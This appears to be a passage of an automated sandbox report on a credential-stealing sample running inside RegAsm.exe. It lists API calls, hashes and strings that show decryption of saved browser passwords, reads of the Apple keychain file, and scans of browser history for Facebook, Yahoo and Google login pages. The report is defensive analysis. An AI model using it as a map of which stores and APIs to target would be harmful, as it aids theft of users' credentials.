                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1945712969-0
                                                                                                                                                                                                                      • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                                                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileFind$FirstNext
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1690352074-0
                                                                                                                                                                                                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InfoSystemmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3558857096-0
                                                                                                                                                                                                                      • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                      • API String ID: 2334598624-3798722523
                                                                                                                                                                                                                      • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                                                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                                                      • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                                                                                                                                                                                      • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                                      • API String ID: 1442760552-28296030

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                                                                                                                                                                                      • String ID: chp$v10
                                                                                                                                                                                                                      • API String ID: 229402216-2783969131

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                        • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                        • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                                                                                                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                                      • String ID: bhv
                                                                                                                                                                                                                      • API String ID: 4234240956-2689659898

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                                                                                                                                                                                      • __set_app_type.MSVCRT ref: 00446762
                                                                                                                                                                                                                      • __p__fmode.MSVCRT ref: 00446777
                                                                                                                                                                                                                      • __p__commode.MSVCRT ref: 00446785
                                                                                                                                                                                                                      • __setusermatherr.MSVCRT ref: 004467B1
                                                                                                                                                                                                                      • _initterm.MSVCRT ref: 004467C7
                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                                                                                                                                                                                      • _initterm.MSVCRT ref: 004467FD
                                                                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                                                                                                                                                                                      • exit.MSVCRT ref: 00446897
                                                                                                                                                                                                                      • _cexit.MSVCRT ref: 0044689D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2791496988-0

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                                                                      • String ID: visited:
                                                                                                                                                                                                                      • API String ID: 2470578098-1702587658

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 free 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                                      • API String ID: 2804212203-2982631422

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 115830560-3916222277

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                      • String ID: r!A
                                                                                                                                                                                                                      • API String ID: 2791114272-628097481

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                      • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                                      • API String ID: 2936932814-4196376884

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
